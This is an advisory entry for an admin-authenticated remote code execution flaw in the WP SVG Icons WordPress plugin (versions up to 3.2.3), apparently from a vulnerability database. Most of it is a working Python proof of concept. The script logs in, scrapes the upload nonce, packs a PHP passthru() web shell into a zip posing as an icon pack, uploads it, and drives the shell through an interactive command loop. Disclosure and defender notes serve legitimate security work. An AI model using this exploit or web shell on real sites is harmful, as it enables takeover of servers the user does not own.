WordPress Plugin Vulnerabilities

WP SVG Icons <= 3.2.3 - Admin+ Remote Code Execution (RCE)

Description

The plugin does not properly validate uploaded custom icon packs, allowing a high-privileged user such as an admin to upload a zip file containing malicious PHP code, leading to remote code execution.

Proof of Concept

import requests
import zipfile

# Target and credentials for the lab instance the PoC was written against
# (constructed sample values; adjust for your own test environment).
BASE_URL = "http://localhost:8000"
# WordPress username. NOTE(review): `id` shadows the builtin of the same
# name; it is only ever passed positionally to login(), so the shadowing is
# harmless here but easy to trip over when extending the script.
id = "wordpress"
# WordPress password for that account.
pw = "wordpress"

def login(id, pw) :
    """Authenticate against wp-login.php and return the cookie-bearing session.

    Args:
        id: WordPress username (parameter name kept as the callers use it).
        pw: WordPress password.

    Returns:
        The ``requests.Session`` whose cookie jar holds whatever the login
        POST set. The response body is never inspected, so a failed login is
        not detected here.
    """
    # Phase : Login (because, we need a nonce value)
    sess = requests.Session()
    sess.post(
        BASE_URL + "/wp-login.php",
        data = {
            'log': id,
            'pwd': pw,
            # Percent-encoded submit-button label (decodes to Korean "로그인",
            # i.e. "log in"); mirrors what the browser form sends.
            'wp-submit': '%EB%A1%9C%EA%B7%B8%EC%9D%B8',
            'testcookie': '1'
        }
    ).text  # the body is read and discarded; only the cookies matter
    
    return sess

def exploit(sess) : 
    """Upload a PHP web shell as a "custom icon pack" and drive it interactively.

    Args:
        sess: an authenticated ``requests.Session`` as returned by ``login``.

    Side effects: writes shellcode.php, selection.json and output.zip into the
    current working directory, uploads the zip through the plugin's admin page,
    then loops on stdin until "exit" or "quit" is typed.

    Defender notes: every stage leaves a server-side trace -- an authenticated
    multipart POST to ``admin.php?page=wp-svg-icons-custom-set`` carrying a
    ``custom_icon_pack`` field, a new .php file appearing under
    ``wp-content/uploads/wp-svg-icons/custom-pack/``, and repeated POSTs to
    that file. Because the shell runs from the uploads directory, a web-server
    rule that denies PHP execution under wp-content/uploads breaks the final
    stage even when the upload itself succeeds.
    """
    # Fetch the plugin's admin page; its upload form embeds the nonce needed
    # for the POST below.
    res = sess.get(
        BASE_URL + "/wp-admin/admin.php?page=wp-svg-icons-custom-set"
    ).text

    # Scrape the hidden-input nonce: the marker string is 38 characters, so
    # +39 also skips the opening quote; the value runs to the closing quote.
    # NOTE(review): a find() miss (marker absent, e.g. login failed) returns -1
    # and is not handled -- the slice silently yields junk and the script
    # carries on regardless.
    res = res[res.find('''wp_svg_icons_upload_validation" value=''') + 39:]
    _nonce = res[:res.find('"')]


    # Minimal PHP web shell: passthru() of whatever arrives in the "qerogram"
    # request parameter.
    with open("shellcode.php", "wb") as f :
        f.write(b"<?php echo(passthru($_REQUEST['qerogram'])); ?>")
    
    # Empty manifest -- presumably what the plugin expects an icon pack to
    # contain; not verified here.
    with open("selection.json", "w") as f :
        f.write("{}")

    # Bundle both files; the plugin evidently extracts the archive server-side,
    # since the shell is later reachable at the uploads path used below.
    with zipfile.ZipFile("output.zip", "w") as ZIP :
        ZIP.write(
            "shellcode.php",
            compress_type=zipfile.ZIP_DEFLATED
        )
        ZIP.write(
            "selection.json",
            compress_type=zipfile.ZIP_DEFLATED
        )
    
    # Multipart upload through the plugin's own form, nonce included. The
    # response is not checked, so upload failures go unnoticed until the
    # shell loop gets non-PHP output back.
    # NOTE(review): the handle from open("output.zip", "rb") is never closed;
    # wrapping it in a `with` block would release it.
    sess.post(
        BASE_URL + "/wp-admin/admin.php?page=wp-svg-icons-custom-set",
        data = {
            "wp_http_referer" : "/wp-admin/admin.php?page=wp-svg-icons-custom-set",
            "wp_svg_icons_upload_validation" : _nonce
        },
        files = {
            "custom_icon_pack" : ("qerogram.zip", open("output.zip", "rb"))
        }
    )

    
    # Interactive loop: each line typed is POSTed to the extracted shell,
    # which the server executes from the uploads directory; "exit"/"quit"
    # (case-insensitive) ends the session.
    while True :
        prompt = input("$ ")
        if prompt.lower() == "exit" or prompt.lower() == "quit" :
            break
        
        res = sess.post(
            BASE_URL + "/wp-content/uploads/wp-svg-icons/custom-pack/shellcode.php",
            data = {
                "qerogram" : prompt
            }
        )
        print(res.text)


# Script entry point. NOTE(review): there is no `if __name__ == "__main__":`
# guard, so merely importing this module runs the whole chain.
sess = login(id, pw)
exploit(sess)

Affects Plugins

References

Classification

Type
RCE
OWASP top 10
CWE

Miscellaneous

Original Researcher
qerogram
Submitter
qerogram
Submitter website
Verified
Yes

Timeline

Publicly Published
2022-05-18 (about 2 years ago)
Added
2022-05-18 (about 2 years ago)
Last Updated
2023-02-07 (about 1 year ago)
